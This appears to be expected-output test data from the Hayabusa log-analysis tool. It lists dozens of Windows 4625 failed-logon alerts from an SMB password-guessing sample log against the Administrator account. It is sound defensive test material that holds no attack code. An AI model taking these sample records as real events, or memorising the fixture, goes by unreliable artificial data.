+2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3eW0nFDUwKFzoQIw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q0i0p5QxJ4ykYYJt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VsxqWAnd6j2CdyB3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y5qdy80mtFWl199k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ce0d84uBK4t2sqR3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b4dZYZEW1VijjwHN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZmqGJWbeap5dv0gC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zaNUqChgVSbDkFQu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B4PDZ55it0V4QGnM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TQxXVB8Aj5gaw2f2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vzDeZtgSJoH74GYk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iNAFsZraFvw67WWR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0aVdnbyzWqk58rOW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WjUH2PopXCrrPzqi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ylmV2z3WjTWsTpyu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8qBKZTYRTKuEAgS8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JvekO4A5f6QK2ynZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LDUqydSeA1guOjIP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o71TltsJDyOIuLQb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NXT3MSCes42dVCNn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FGXiWeT8Evr6G70M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V2RarzrnGgcLaseH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u3k7dXu9o1vMkhby  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EDBt76dmYnPstFWw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4yjzMC7cw0fe7gjS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eQOWCM7KP68DZTX9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kn9WWWqCIwfrPbie  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AQcamLSzsXOjP6FL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6R6ZMRoYkAPB35Bq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ubqnZm0jmHNFCHrM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7ORQ8vL1oo6CkJXK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rDPl1SSddrWEs979  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VrK7fENAr1lxFr9x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wu4djhEVSMYBOmjF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7e0NOdXhEkW6MskA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7nqxLHaOtkHHNAa1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NCrCf73NtEpk5DUR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YVFm1epksVGO1nFY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YmVehuMHvh5kVqRW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sERZrNUHsKVEShCb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eaSNgw2hvkxLnQF8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FSYOWptgxHYTDv1x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Van1qwuRoWYPWrIY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TyLCa9OHocazZKQ2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XxrR5iUsTI9LVnLL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TxMREacN0QfvL51B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7fbzSHaZBDH4zFZZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NgIei0bMIcslJCVa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JPoKjwanczELBC5A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QOYMVAnCWB2RFYAk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k1S45GBtQ8Uoyilw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 60oeDAnU41sz1wYg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: enjlrrdf6lrm7Bao  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 58WzO6wxh7QshZgS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7eZKzHgu5ADLYsWU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uOSK3xC1E5PpBVNM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vFXasYWGCHbQOWWI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4XlYJ3oHYKYhg0KC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LxOKwi8Q4y2mHBDu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xwFKFySH4w2yWtPX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OlwGTGadOEMfUFiM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hZ9WuMoOtxGdwOQn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cCLK0gWvRoz0Ceao  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZDrcOxtm2fHXK5pO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pm2tPGetcAJkSuvK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FBskiUSfF2ghuDcF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mZJal2nq3JAk6I2S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y9ek0Sl1ikhIfIb6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eHrn5Tp9JtnAgCbE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k7tR8gp2piqqixqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SqSBRMoiFeWe4FAt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Nu4m1xKDU0OUkoR0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
